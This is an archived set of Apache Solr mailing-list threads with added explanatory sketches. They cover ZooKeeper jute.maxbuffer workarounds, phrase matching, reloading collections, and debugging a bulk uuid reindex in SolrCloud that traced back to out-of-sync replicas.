> > 2) Set the jute.maxbuffer system property on the startup commandline for > all ZK servers and all ZK clients (Solr instances) to a size that's > large enough to accommodate the huge znode. In order to do the deletion > mentioned in option 1 above, you might need to increase jute.maxbuffer on > the servers and the client you use for the deletion. > > These are just workarounds. Whatever caused the huge queue in the first > place must be addressed. It is frequently a performance issue. If you > go to the following link, you will see that jute.maxbuffer is considered > an unsafe option: > > http://zookeeper.apache.org/doc/r3.3.3/zookeeperAdmin.html#Unsafe+Options > > In Jira issue SOLR-7191, I wrote the following in one of my comments: > > "The giant queue I encountered was about 85 entries, and resulted in > a packet length of a little over 14 megabytes. If I divide 85 by 14, > I know that I can have about 6 overseer queue entries in one znode > before jute.maxbuffer needs to be increased." > > https://issues.apache.org/jira/browse/SOLR-7191?focusedCommentId=14347834 > > Thanks, > Shawn > >
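Shawn's workaround 2 means passing the same system property to every ZooKeeper server JVM and every Solr JVM. One way to do that (the 16MB value and file paths are examples; size it above the reported packet length, here len11823809, about 11.3MB):

```sh
# ZooKeeper side: conf/java.env is sourced by zkEnv.sh on startup
export JVMFLAGS="-Djute.maxbuffer=16777216"

# Solr side (4.x, jetty start.jar style): add the same property to the command line
java -Djute.maxbuffer=16777216 -jar start.jar
```

As Shawn notes, the value must match on servers and clients, and the ZooKeeper documentation flags jute.maxbuffer as an unsafe option, so this is a temporary measure while the oversized overseer queue is drained and its root cause fixed.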
Re: Reverse query?
Hello Remi, I am assuming the field where you store the data is analyzed. The field definition might help us answer your question better. If you are using the edismax handler for your search requests, I believe you can achieve your goal by setting your "mm" to 100% and the phrase slop "ps" and query slop "qs" parameters to zero. I think that will force exact matches. Thanks Ravi Kiran Bhaskar On Fri, Oct 2, 2015 at 9:48 AM, Andrea Roggerone < andrearoggerone.o...@gmail.com> wrote: > Hi Remy, > The question is not really clear, could you explain a little bit better > what you need? Reading your email I understand that you want to get > documents containing all the search terms typed. For instance if you search > for "Mad Max", you wanna get documents containing both Mad and Max. If > that's your need, you can use a phrase query like: > > "Mad Max"~2 > > where enclosing your keywords between double quotes means that you want to > get both Mad and Max and the optional parameter ~2 is an example of *slop*. > If you need more info you can look for *Phrase Query* in > https://wiki.apache.org/solr/SolrRelevancyFAQ > > On Fri, Oct 2, 2015 at 2:33 PM, remi tassing <tassingr...@gmail.com> > wrote: > > > Hi, > > I have medium-low experience on Solr and I have a question I couldn't > quite > > solve yet. > > > > Typically we have quite short query strings (a couple of words) and the > > search is done through a set of bigger documents. What if the logic is > > turned a little bit around. I have a document and I need to find out what > > strings appear in the document. A string here could be a person name > > (including space for example) or a location...which are indexed in Solr. > > > > A concrete example, we take this text from wikipedia (Mad Max): > > "*Mad Max is a 1979 Australian dystopian action film directed by George > > Miller <https://en.wikipedia.org/wiki/George_Miller_%28director%29>. 
> > Written by Miller and James McCausland from a story by Miller and > producer > > Byron Kennedy <https://en.wikipedia.org/wiki/Byron_Kennedy>, it tells a > > story of societal breakdown > > <https://en.wikipedia.org/wiki/Societal_collapse>, murder, and vengeance > > <https://en.wikipedia.org/wiki/Revenge>. The film, starring the > > then-little-known Mel Gibson <https://en.wikipedia.org/wiki/Mel_Gibson>, > > was released internationally in 1980. It became a top-grossing Australian > > film, while holding the record in the Guinness Book of Records > > <https://en.wikipedia.org/wiki/Guinness_Book_of_Records> for decades as > > the > > most profitable film ever created,[1] > > <https://en.wikipedia.org/wiki/Mad_Max_%28franchise%29#cite_note-1> and > > has > > been credited for further opening the global market to Australian New > Wave > > <https://en.wikipedia.org/wiki/Australian_New_Wave> films.* > > <https://en.wikipedia.org/wiki/Mad_Max_%28franchise%29#cite_note-2> > > <https://en.wikipedia.org/wiki/Mad_Max_%28franchise%29#cite_note-3>" > > > > I would like it to match "Mad Max" but not "Mad" or "Max" seperately, and > > "George Miller", "global market" ... > > > > I've tried the keywordTokenizer but it didn't work. I suppose it's ok for > > the index time but not query time (in this specific case) > > > > I had a look at Luwak but it's not what I'm looking for ( > > > > > http://www.flax.co.uk/blog/2013/12/06/introducing-luwak-a-library-for-high-performance-stored-queries/ > > ) > > > > The typical name search doesn't seem to work either, > > https://dzone.com/articles/tips-name-search-solr > > > > I was thinking this problem must have already be solved...or? > > > > Remi > > >
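Outside of Solr, the behavior Remi describes (given a document, find which entries of a known list of multi-word strings occur in it) can be prototyped as whole-word phrase matching over a dictionary. This toy sketch (class and method names are mine, not from the thread) ignores analysis details such as stemming and tokenizer subtleties, but makes the goal concrete: "Mad Max" matches only as a unit, not as "Mad" or "Max" separately.

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

public class PhraseMatcher {

    // Normalize to a lowercase word sequence padded with spaces, so that
    // contains() checks match whole-word phrase occurrences only.
    private static String norm(String s) {
        return " " + s.toLowerCase().replaceAll("[^a-z0-9]+", " ").trim() + " ";
    }

    // Return every dictionary phrase that occurs as a whole-word sequence in text.
    public static List<String> match(String text, List<String> phrases) {
        String haystack = norm(text);
        List<String> hits = new ArrayList<>();
        for (String phrase : phrases) {
            if (haystack.contains(norm(phrase))) {
                hits.add(phrase);
            }
        }
        return hits;
    }

    public static void main(String[] args) {
        List<String> dict = Arrays.asList("Mad Max", "George Miller", "Byron Kennedy");
        System.out.println(match("Mad Max is a 1979 film directed by George Miller.", dict));
        // prints [Mad Max, George Miller]
    }
}
```

This linear scan obviously does not scale to a large dictionary; doing it efficiently against indexed queries is, as I understand it, exactly what Luwak (built on Lucene's MemoryIndex) is for, so it may be worth a second look despite the original poster's impression.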
Re: Solr 4.7.2 Vs 5.3.0 Docs different for same query
Thank you very much Erick and Uchida. I will take a look at the URL you gave, Erick. Thanks Ravi Kiran Bhaskar On Fri, Oct 2, 2015 at 12:41 PM, Tomoko Uchida <tomoko.uchida.1...@gmail.com > wrote: > Hi Ravi, > > And for minor additional information, > you may want to look through Collections API reference guide to handle > collections properly in SolrCloud environment. (I bookmark this page.) > https://cwiki.apache.org/confluence/display/solr/Collections+API > <https://cwiki.apache.org/confluence/display/solr/Collections+API> > > Regards, > Tomoko > > 2015-10-03 1:15 GMT+09:00 Erick Erickson <erickerick...@gmail.com>: > > > do we have to "reload" the collections on all the nodes to see the > > updated config ?? > > YES > > > > Is there a single call which can update all nodes connected to the > > ensemble ?? > > > > NO. I'll be a little pedantic here. When you say "ensemble", I'm not > quite > > sure > > what that means and am interpreting it as "all collections registered > with > > ZK". > > But see below. > > > > I just went to the admin UI and hit "Reload" button manually on each > > of the node...Is that > > the correct way to do it ? > > > > NO. The admin UI, "core admin" is a remnant from the old days (like > > 3.x) where there was > > no concept of distributed collection as a distinct entity, you had to > > do all the things you now > > do automatically in SolrCloud "by hand". PLEASE DO NOT USE THIS > > EXCEPT TO VIEW A REPLICA WHEN USING SOLRCLOUD! In particular, don't try > to > > take any action that manipulates the core (reload, add, unload and the > > like). > > It'll work, but you have to know _exactly_ what you are doing. Go > > ahead and use it for > > viewing the current state of a replica/core, but unless you need to do > > something that > > you cannot do with the Collections API it's very easy to go astray. > > > > > > Instead, use the "collections API". 
In this case, there's a call like > > > > > > > http://localhost:8983/solr/admin/collections?action=RELOAD&name=CollectionName > > > > that will cause all the replicas associated with the collection to be > > reloaded. Given you > > mentioned linkconfig, I'm guessing that you have more than one > > collection looking at a > > particular configset, so the pedantic bit is you'd have to issue the > > above for each > > collection that references that configset. > > > > Best, > > Erick > > > > P.S. Two bits: > > 1> actually the collections API uses the core admin calls to > > accomplish its tasks, but > > lots of effort went in to doing exactly the right thing > > 2> Upayavira has been creating an updated admin UI that will treat > > collections as > > first-class citizens (a work in progress). You can access it in 5.x by > > hitting > > > > solr_host:solr_port/solr/index.html > > > > Give it a whirl if you can and please provide any feedback you can, it'd > > be much > > appreciated. > > > > On Fri, Oct 2, 2015 at 7:47 AM, Ravi Solr <ravis...@gmail.com> wrote: > > > Mr. Uchida, > > > Thank you for responding. It was my fault, I had a update > > processor > > > which takes specific text and string fields and concatenates them into > a > > > single field, and I search on that single field. Recently I used Atomic > > > update to fix a specific field's value and forgot to disable the > > > UpdateProcessor chain...Since I was only updating one field the > aggregate > > > field got messed up with just that field value and hence I had issues > > > searching. I reindexed the data again yesterday night and now it is all > > > good. > > > > > > I do have a small question, when we update the zookeeper ensemble with > > new > > > configs via 'upconfig' and 'linkconfig' commands do we have to "reload" > > the > > > collections on all the nodes to see the updated config ?? Is there a > > single > > > call which can update all nodes connected to the ensemble ?? 
I just > went > > to > > > the admin UI and hit "Reload" button manually on each of the node...Is > > that > > > the correct way to do it ? > > > > > > Thanks > > > > > > Ravi Kiran Bhaskar > > > > > > On Fri, Oct 2, 2015 at 12:04 AM, Tomoko Uchida < > > tomoko.uchida.1...@gmail.com > > >>
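For reference, the reload call Erick describes passes the collection in the name parameter, and mailing-list archives tend to eat the ampersand-separated parameters, so written out in full (host, port, and collection name are placeholders):

```sh
curl "http://localhost:8983/solr/admin/collections?action=RELOAD&name=CollectionName"
```

Per Erick's point about linkconfig, this has to be issued once per collection that references the updated configset; a reload of one collection does not refresh the others.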
Solr 4.7.2 Vs 5.3.0 Docs different for same query
We migrated from 4.7.2 to 5.3.0. I sourced the docs from the 4.7.2 core and indexed them into the 5.3.0 collection (data directories are different) via SolrEntityProcessor. Currently my production is all whack because of this issue. Do I have to go back and reindex everything again? Is there a quick fix for this? Here are the results for the query 'obama'... please note the numFound. 4.7.2 has almost 148519 docs while 5.3.0 says it only has 5.3.0 docs. Any pointers on how to correct this? [response XML stripped by the archive: both the Solr 4.7.2 and the SolrCloud 5.3.0 responses show status=0 and QTime=2 for q=obama; the numFound values did not survive] Thanks Ravi Kiran Bhaskar
Re: bulk reindexing 5.3.0 issue
Gili, I was constantly checking the cloud admin UI and it always stayed green, which is why I initially overlooked sync issues... finally, when all options dried up, I went to each node individually and queried, and that is when I found the out-of-sync issue. The way I resolved my issue was to shut down the leader that was not syncing properly and let another node become the leader, then reindex all docs. Once the reindexing was done I started the node that was causing the issue and it synced properly :-) Thanks Ravi Kiran Bhaskar On Mon, Sep 28, 2015 at 10:26 AM, Gili Nachum <gilinac...@gmail.com> wrote: > Were all of shard replica in active state (green color in admin ui) before > starting? > Sounds like it otherwise you won't hit the replica that is out of sync. > > Replicas can get out of sync, and report being in sync after a sequence of > stop start w/o a chance to complete sync. > See if it might have happened to you: > > http://mail-archives.apache.org/mod_mbox/lucene-solr-user/201412.mbox/%3CCAOOKt53XTU_e0m2ioJ-S4SfsAp8JC6m-=nybbd4g_mjh60b...@mail.gmail.com%3E > On Sep 27, 2015 06:56, "Ravi Solr" <ravis...@gmail.com> wrote: > > > Erick...There is only one type of String > > "sun.org.mozilla.javascript.internal.NativeString:" and no other > variations > > of that in my index, so no question of missing it. Point taken regarding > > the CURSORMARK stuff, yes you are correct, my head so numb at this point > > after working 3 days on this, I wasnt thinking straight. > > > > BTW I found the real issue, I have a total of 8 servers in the solr > cloud. > > The leader for this specific collection was the one that was returning 0 > > for the searches. All other 7 servers had roughly 800K docs still needing > > the string replacement. So maybe the real issue is sync among servers. > Just > > to prove to myself I shutdown the solr that was giving zero results > (i.e. 
> > all uuid strings have already been somehow devoid of spurious > > sun.org.mozilla.javascript.internal.NativeString on that server). Now it > > ran perfectly fine and is about to finish as last 103K are still left > when > > I was writing this email. > > > > So the real question is how can we ensure that the Sync is always > > maintained and what to do if it ever goes out of Sync, I did see some > Jira > > tickets from previous 4.10.x versions where Sync was an issue. Can you > > please point me to any doc which says how SolrCloud synchs/replicates ? > > > > Thanks, > > > > Ravi Kiran Bhaskar > > > > Thanks > > > > Rvai Kiran Bhaskar > > > > On Sat, Sep 26, 2015 at 11:00 PM, Erick Erickson < > erickerick...@gmail.com> > > wrote: > > > > > bq: 3. Erick, I wasnt getting all 1.4 mill in one shot. I was initially > > > using > > > 100 docs batch, which, I later increased to 500 docs per batch. Also it > > > would not be a infinite loop if I commit for each batch, right !!?? > > > > > > That's not the point at all. Look at the basic logic here: > > > > > > You run for a while processing 100 (or 500 or 1,000) docs per batch > > > and change all uuid fields with this statement: > > > > > > uuid.replace("sun.org.mozilla.javascript.internal.NativeString:", ""); > > > > > > and then update the doc. You run this as long as you have any docs > > > that satisfy the query "q=uuid:sun.org.mozilla*", _changing_ > > > every one that has this string! > > > > > > At that point, theoretically, no document in your index has this > string. > > So > > > running your update program immediately after should find _zero_ > > documents. > > > > > > I've been assuming your complaint is that you don't process 1.4 M docs > > (in > > > batches), you process some lower number then exit and you think this is > > > wrong. > > > I'm claiming that you should only expect to find as many docs as have > > been > > > indexed since the last time the program ran. 
> > > > > > As far as the infinite loop is concerned, again trace the logic in the > > old > > > code. > > > Forget about commits and all the mechanics, just look at the logic. > > > You're querying on "sun.org.mozilla*". But you only change if you get a > > > match on > > > "sun.org.mozilla.javascript.internal.NativeString:" > > > > > > Now imagine you have a doc that has sun.org.mozilla.erick in it. That > doc > > > gets > > > returned fr
Re: bulk reindexing 5.3.0 issue
Erick, I fixed the "missing content stream" issue as well, by making sure I am not adding an empty list. However, my very first issue of getting zero docs once in a while is still haunting me, even after using cursorMarks and disabling auto commit and soft commit. I ran the code two times, and you can see that the statement returns zero docs at random times. log.info("Indexed " + count + "/" + docList.getNumFound()); -bash-4.1$ tail -f reindexing.log 2015-09-26 01:44:40 INFO [a.b.c.AdhocCorrectUUID] - Indexed 6500/1440653 2015-09-26 01:44:44 INFO [a.b.c.AdhocCorrectUUID] - Indexed 7000/1439863 2015-09-26 01:44:48 INFO [a.b.c.AdhocCorrectUUID] - Indexed 7500/1439410 2015-09-26 01:44:56 INFO [a.b.c.AdhocCorrectUUID] - Indexed 8000/1438918 2015-09-26 01:45:01 INFO [a.b.c.AdhocCorrectUUID] - Indexed 8500/1438330 2015-09-26 01:45:01 INFO [a.b.c.AdhocCorrectUUID] - Indexed 8500/0 2015-09-26 01:45:06 INFO [a.b.c.AdhocCorrectUUID] - FINISHED !!! 2015-09-26 01:48:15 INFO [a.b.c.AdhocCorrectUUID] - Indexed 500/1437440 2015-09-26 01:48:19 INFO [a.b.c.AdhocCorrectUUID] - Indexed 1000/1437440 2015-09-26 01:48:19 INFO [a.b.c.AdhocCorrectUUID] - Indexed 1000/0 2015-09-26 01:48:22 INFO [a.b.c.AdhocCorrectUUID] - FINISHED !!! Thanks Ravi Kiran Bhaskar On Sat, Sep 26, 2015 at 1:17 AM, Ravi Solr <ravis...@gmail.com> wrote: > Erick as per your advise I used cursorMarks (see code below). It was > slightly better but Solr throws Exceptions randomly. 
Please look at the > code and Stacktrace below > > 2015-09-26 01:00:45 INFO [a.b.c.AdhocCorrectUUID] - Indexed 500/1453133 > 2015-09-26 01:00:49 INFO [a.b.c.AdhocCorrectUUID] - Indexed 1000/1453133 > 2015-09-26 01:00:54 INFO [a.b.c.AdhocCorrectUUID] - Indexed 1500/1452592 > 2015-09-26 01:00:58 INFO [a.b.c.AdhocCorrectUUID] - Indexed 2000/1452095 > 2015-09-26 01:01:03 INFO [a.b.c.AdhocCorrectUUID] - Indexed 2500/1451675 > 2015-09-26 01:01:10 INFO [a.b.c.AdhocCorrectUUID] - Indexed 3000/1450924 > 2015-09-26 01:01:15 INFO [a.b.c.AdhocCorrectUUID] - Indexed 3500/1450445 > 2015-09-26 01:01:19 INFO [a.b.c.AdhocCorrectUUID] - Indexed 4000/1449997 > 2015-09-26 01:01:24 INFO [a.b.c.AdhocCorrectUUID] - Indexed 4500/1449692 > 2015-09-26 01:01:28 INFO [a.b.c.AdhocCorrectUUID] - Indexed 5000/1449201 > 2015-09-26 01:01:28 ERROR [a.b.c.AdhocCorrectUUID] - Error indexing > org.apache.solr.client.solrj.impl.HttpSolrClient$RemoteSolrException: > Error from server at http://xx.xx.xx.xx:/solr/collection1: missing > content stream > at > org.apache.solr.client.solrj.impl.HttpSolrClient.executeMethod(HttpSolrClient.java:560) > at > org.apache.solr.client.solrj.impl.HttpSolrClient.request(HttpSolrClient.java:234) > at > org.apache.solr.client.solrj.impl.HttpSolrClient.request(HttpSolrClient.java:226) > at > org.apache.solr.client.solrj.impl.LBHttpSolrClient.doRequest(LBHttpSolrClient.java:376) > at > org.apache.solr.client.solrj.impl.LBHttpSolrClient.request(LBHttpSolrClient.java:328) > at > org.apache.solr.client.solrj.impl.CloudSolrClient.sendRequest(CloudSolrClient.java:1085) > at > org.apache.solr.client.solrj.impl.CloudSolrClient.requestWithRetryOnStaleState(CloudSolrClient.java:856) > at > org.apache.solr.client.solrj.impl.CloudSolrClient.request(CloudSolrClient.java:799) > at > org.apache.solr.client.solrj.SolrRequest.process(SolrRequest.java:135) > at org.apache.solr.client.solrj.SolrClient.add(SolrClient.java:107) > at 
org.apache.solr.client.solrj.SolrClient.add(SolrClient.java:72) > at org.apache.solr.client.solrj.SolrClient.add(SolrClient.java:86) > at a.b.c.AdhocCorrectUUID.processDocs(AdhocCorrectUUID.java:97) > at a.b.c.AdhocCorrectUUID.main(AdhocCorrectUUID.java:37) > at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) > at > sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57) > at > sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) > at java.lang.reflect.Method.invoke(Method.java:606) > at com.simontuffs.onejar.Boot.run(Boot.java:306) > at com.simontuffs.onejar.Boot.main(Boot.java:159) > 2015-09-26 01:01:28 INFO [a.b.c.AdhocCorrectUUID] - FINISHED !!! > > > CODE > > protected static void processDocs() { > > try { > CloudSolrClient client = new > CloudSolrClient("zk1:,zk2:,zk3.com:"); > client.setDefaultCollection("collection1"); > > boolean done = false; > String cursorMark = CursorMarkParams.CURSOR_MARK_START; > Integer count = 0; > > while (!done) { > SolrQuery q = new > SolrQuery("*:*").setRows(500).addSort(&
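The quoted program above is cut off by the archive. For reference, the standard deep-paging loop from the Solr cursor documentation looks roughly like this sketch (it assumes `client` is the CloudSolrClient from the quoted snippet and a reachable cluster, so it is illustrative rather than runnable here):

```java
// Sketch of the standard cursorMark loop (SolrJ 4.7+ API).
SolrQuery q = new SolrQuery("uuid:sun.org.mozilla*");
q.setRows(500);
q.addSort("uniqueId", SolrQuery.ORDER.asc);   // sort must end on the uniqueKey field
String cursorMark = CursorMarkParams.CURSOR_MARK_START;
boolean done = false;
while (!done) {
    q.set(CursorMarkParams.CURSOR_MARK_PARAM, cursorMark);
    QueryResponse rsp = client.query(q);
    String nextCursorMark = rsp.getNextCursorMark();
    for (SolrDocument doc : rsp.getResults()) {
        // fix the uuid value and collect the doc for a batched update ...
    }
    done = cursorMark.equals(nextCursorMark);  // unchanged mark means no more results
    cursorMark = nextCursorMark;
}
```

Note the contract Erick describes elsewhere in this thread: the query itself must stay identical on every iteration, with only the cursorMark parameter changing; reindexing the very documents the cursor is walking over is what makes the counts unstable.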
Re: bulk reindexing 5.3.0 issue
Erick & Shawn, I incorporated your suggestions. 0. Shut off all other indexing processes. 1. As Shawn mentioned, set batch size to 1. 2. Loved Erick's suggestion about not using a filter at all, sorting by uniqueId, and putting the last known uniqueId as the next query's start while still using cursor marks, as follows: SolrQuery q = new SolrQuery("+uuid:sun.org.mozilla* +uniqueId:{" + markerSysId + " TO *]").setRows(1).addSort("uniqueId",ORDER.asc).setFields(new String[]{"uniqueId","uuid"}); q.set(CursorMarkParams.CURSOR_MARK_PARAM, cursorMark); 3. As per Shawn's advice, commented out autocommit and soft commit in solrconfig.xml, set openSearcher to false, and issued a MANUAL COMMIT for every batch from code as follows: client.commit(true, true, true); Here are the log statement & results - log.info("Indexed " + count + "/" + docList.getNumFound()); 2015-09-26 17:29:57 INFO [a.b.c.AdhocCorrectUUID] - Indexed 9/1344085 2015-09-26 17:30:30 INFO [a.b.c.AdhocCorrectUUID] - Indexed 10/1334085 2015-09-26 17:33:26 INFO [a.b.c.AdhocCorrectUUID] - Indexed 11/1324085 2015-09-26 17:36:09 INFO [a.b.c.AdhocCorrectUUID] - Indexed 12/1314085 2015-09-26 17:39:42 INFO [a.b.c.AdhocCorrectUUID] - Indexed 13/1304085 2015-09-26 17:43:05 INFO [a.b.c.AdhocCorrectUUID] - Indexed 14/1294085 2015-09-26 17:46:14 INFO [a.b.c.AdhocCorrectUUID] - Indexed 15/1284085 2015-09-26 17:48:22 INFO [a.b.c.AdhocCorrectUUID] - Indexed 16/1274085 2015-09-26 17:48:25 INFO [a.b.c.AdhocCorrectUUID] - Indexed 16/0 2015-09-26 17:48:25 INFO [a.b.c.AdhocCorrectUUID] - FINISHED !!! Ran manually a second time to see if the first was a fluke. Still the same. 
2015-09-26 17:55:26 INFO [a.b.c.AdhocCorrectUUID] - Indexed 1/1264716 2015-09-26 17:58:07 INFO [a.b.c.AdhocCorrectUUID] - Indexed 2/1254716 2015-09-26 18:03:09 INFO [a.b.c.AdhocCorrectUUID] - Indexed 3/1244716 2015-09-26 18:06:32 INFO [a.b.c.AdhocCorrectUUID] - Indexed 4/1234716 2015-09-26 18:10:35 INFO [a.b.c.AdhocCorrectUUID] - Indexed 5/1224716 2015-09-26 18:15:23 INFO [a.b.c.AdhocCorrectUUID] - Indexed 6/1214716 2015-09-26 18:15:24 INFO [a.b.c.AdhocCorrectUUID] - Indexed 6/0 2015-09-26 18:15:26 INFO [a.b.c.AdhocCorrectUUID] - FINISHED !!! Now changed the autocommit in solrconfig.xml as follows... Note the soft commit has been shut off as per Shawn's advice. [autoCommit XML stripped by the archive; only the values 30 and false survive] 2015-09-26 18:47:44 INFO [com.wpost.search.reindexing.AdhocCorrectUUID] - Indexed 1/1205451 2015-09-26 18:50:49 INFO [com.wpost.search.reindexing.AdhocCorrectUUID] - Indexed 2/1195451 2015-09-26 18:54:18 INFO [com.wpost.search.reindexing.AdhocCorrectUUID] - Indexed 3/1185451 2015-09-26 18:57:04 INFO [com.wpost.search.reindexing.AdhocCorrectUUID] - Indexed 4/1175451 2015-09-26 19:00:10 INFO [com.wpost.search.reindexing.AdhocCorrectUUID] - Indexed 5/1165451 2015-09-26 19:00:13 INFO [com.wpost.search.reindexing.AdhocCorrectUUID] - Indexed 5/0 2015-09-26 19:00:13 INFO [com.wpost.search.reindexing.AdhocCorrectUUID] - FINISHED !!! The query still returned 0 results when there are over a million docs available which match uuid:sun.org.mozilla* ... Then why do I get 0 ??? Thanks Ravi Kiran Bhaskar On Sat, Sep 26, 2015 at 3:49 PM, Ravi Solr <ravis...@gmail.com> wrote: > Thank you Erick & Shawn for taking significant time off your weekends to > debug and explain in great detail. I will try to address the main points > from your emails to provide more situation context for better understanding > of my situation > > 1. Erick, As part of our upgrade from 4.7.2 to 5.3.0 I re-indexed all docs > from my old Master-Slave to My SolrCloud using DIH SolrEntityProcessor > which used a Script Transformer. 
I unwittingly messed up the script and > hence this 'uuid' (String Type field) got messed up. All records prior to > Sep 20 2015 have this issue that I am currently try to rectify. > > 2. Regarding openSearcher=true/false, I had it as false all along in my > 4.7.2 config. I read somewhere that SolrCloud or 5.x doesn't honor it or it > should be left default (Don't exactly remember where I read it), hence, I > removed it from my solrconfig.xml going against my intuition :-) > > 3. Erick, I wasnt getting all 1.4 mill in one shot. I was initially using > 100 docs batch, which, I later increased to 500 docs per batch. Also it > would not be a infinite loop if I commit for each batch, right !!?? > > 4. Shawn, you are correct the uuid is of String Type and its not unique > key for my schema. My uniqueKey is uniqueId and systemid is of no > consequence here, it's another field for differentiating apps within my > solr. > > Than you very much again guys. I will incorporate your suggestions and > report back. > > Thanks > > Ravi Kiran Bhaskar > &g
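The autoCommit settings discussed in this thread got stripped of their XML by the archive; for reference, in solrconfig.xml they normally take this shape inside the updateHandler section (the maxTime value here is only an example, not the poster's actual setting):

```xml
<!-- solrconfig.xml sketch: hard-commit periodically without opening a new
     searcher, and leave soft commits off during bulk reindexing. -->
<autoCommit>
  <maxTime>300000</maxTime>           <!-- example: hard commit every 5 minutes -->
  <openSearcher>false</openSearcher>
</autoCommit>
<!-- autoSoftCommit omitted/disabled while the bulk job runs -->
```

With openSearcher=false, hard commits make updates durable without exposing them to queries; visibility then comes from an explicit commit (or soft commit) issued when the job finishes.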
Re: bulk reindexing 5.3.0 issue
Thank you Erick & Shawn for taking significant time off your weekends to debug and explain in great detail. I will try to address the main points from your emails to provide more context for better understanding of my situation. 1. Erick, as part of our upgrade from 4.7.2 to 5.3.0, I re-indexed all docs from my old master-slave setup to my SolrCloud using the DIH SolrEntityProcessor, which used a Script Transformer. I unwittingly messed up the script and hence this 'uuid' (string-type field) got messed up. All records prior to Sep 20 2015 have this issue, which I am currently trying to rectify. 2. Regarding openSearcher=true/false, I had it as false all along in my 4.7.2 config. I read somewhere that SolrCloud or 5.x doesn't honor it or that it should be left at the default (I don't exactly remember where I read it), hence I removed it from my solrconfig.xml, going against my intuition :-) 3. Erick, I wasn't getting all 1.4 million in one shot. I was initially using a 100-doc batch, which I later increased to 500 docs per batch. Also, it would not be an infinite loop if I commit for each batch, right!? 4. Shawn, you are correct that the uuid is of string type and is not the unique key for my schema. My uniqueKey is uniqueId, and systemid is of no consequence here; it's another field for differentiating apps within my solr. Thank you very much again, guys. I will incorporate your suggestions and report back. Thanks Ravi Kiran Bhaskar On Sat, Sep 26, 2015 at 12:58 PM, Erick Erickson <erickerick...@gmail.com> wrote: > Oh, one more thing. _assuming_ you can't change the indexing process > that gets the docs from the system of record, why not just add an > update processor that does this at index time? See: > https://cwiki.apache.org/confluence/display/solr/Update+Request+Processors > , > in particular the StatelessScriptUpdateProcessorFactory might be a > good candidate. It just takes a bit of javascript (or other scripting > language) and changes the record before it gets indexed. 
> > FWIW, > Erick > > On Sat, Sep 26, 2015 at 9:52 AM, Shawn Heisey <apa...@elyograg.org> wrote: > > On 9/26/2015 10:41 AM, Shawn Heisey wrote: > >> 30 > > > > This needs to include openSearcher=false, as Erick mentioned. I'm sorry > > I screwed that up: > > > > > > 30 > > false > > > > > > Thanks, > > Shawn >
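Erick's StatelessScriptUpdateProcessorFactory suggestion would look roughly like this; the chain name, script file name, and field handling are examples for this thread's uuid problem, not a verbatim recipe:

```xml
<!-- solrconfig.xml sketch: run a script on each document before it is indexed -->
<updateRequestProcessorChain name="fix-uuid">
  <processor class="solr.StatelessScriptUpdateProcessorFactory">
    <str name="script">fix-uuid.js</str>
  </processor>
  <processor class="solr.LogUpdateProcessorFactory"/>
  <processor class="solr.RunUpdateProcessorFactory"/>
</updateRequestProcessorChain>
```

where fix-uuid.js (placed in the config directory) strips the bad prefix:

```javascript
function processAdd(cmd) {
  var doc = cmd.solrDoc;                       // the SolrInputDocument being added
  var uuid = doc.getFieldValue("uuid");
  if (uuid != null) {
    doc.setField("uuid",
        uuid.replace("sun.org.mozilla.javascript.internal.NativeString:", ""));
  }
}
```

Indexing requests then either pass update.chain=fix-uuid or the chain is marked as the default, so new documents come in clean while the one-off batch job repairs the historical ones.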
Re: bulk reindexing 5.3.0 issue
Erick... There is only one type of string, "sun.org.mozilla.javascript.internal.NativeString:", and no other variations of it in my index, so no question of missing it. Point taken regarding the CURSORMARK stuff; yes, you are correct - my head is so numb at this point, after working 3 days on this, that I wasn't thinking straight. BTW, I found the real issue: I have a total of 8 servers in the solr cloud. The leader for this specific collection was the one that was returning 0 for the searches. All the other 7 servers had roughly 800K docs still needing the string replacement. So maybe the real issue is sync among servers. Just to prove it to myself, I shut down the solr that was giving zero results (i.e. all uuid strings on that server had already somehow been devoid of the spurious sun.org.mozilla.javascript.internal.NativeString). Now it runs perfectly fine and is about to finish, as only the last 103K are left as I write this email. So the real question is how we can ensure that the sync is always maintained, and what to do if it ever goes out of sync. I did see some Jira tickets from previous 4.10.x versions where sync was an issue. Can you please point me to any doc which explains how SolrCloud syncs/replicates? Thanks, Ravi Kiran Bhaskar On Sat, Sep 26, 2015 at 11:00 PM, Erick Erickson <erickerick...@gmail.com> wrote: > bq: 3. Erick, I wasnt getting all 1.4 mill in one shot. I was initially > using > 100 docs batch, which, I later increased to 500 docs per batch. Also it > would not be a infinite loop if I commit for each batch, right !!?? > > That's not the point at all. Look at the basic logic here: > > You run for a while processing 100 (or 500 or 1,000) docs per batch > and change all uuid fields with this statement: > > uuid.replace("sun.org.mozilla.javascript.internal.NativeString:", ""); > > and then update the doc. 
You run this as long as you have any docs > that satisfy the query "q=uuid:sun.org.mozilla*", _changing_ > every one that has this string! > > At that point, theoretically, no document in your index has this string. So > running your update program immediately after should find _zero_ documents. > > I've been assuming your complaint is that you don't process 1.4 M docs (in > batches), you process some lower number then exit and you think this is > wrong. > I'm claiming that you should only expect to find as many docs as have been > indexed since the last time the program ran. > > As far as the infinite loop is concerned, again trace the logic in the old > code. > Forget about commits and all the mechanics, just look at the logic. > You're querying on "sun.org.mozilla*". But you only change if you get a > match on > "sun.org.mozilla.javascript.internal.NativeString:" > > Now imagine you have a doc that has sun.org.mozilla.erick in it. That doc > gets > returned from the query but does _not_ get modified because it doesn't > match your pattern. In the older code, it would be found again and > returned next > time you queried. Then not modified again. Eventually you'd be in a > position > where you never changed any docs, just kept getting the same docList back > over and over again. Marching through based on the unique key should not > have the same potential issue. > > You should not be mixing the new query stuff with CURSORMARK. Deep paging > supposes the exact same query is being run over and over and you're > _paging_ > through the results. You're changing the query every time so the results > aren't > very predictable. > > Best, > Erick > > > On Sat, Sep 26, 2015 at 5:01 PM, Ravi Solr <ravis...@gmail.com> wrote: > > Erick & Shawn I incrporated your suggestions. > > > > > > 0. Shut off all other indexing processes. > > 1. As Shawn mentioned set batch size to 1. > > 2. 
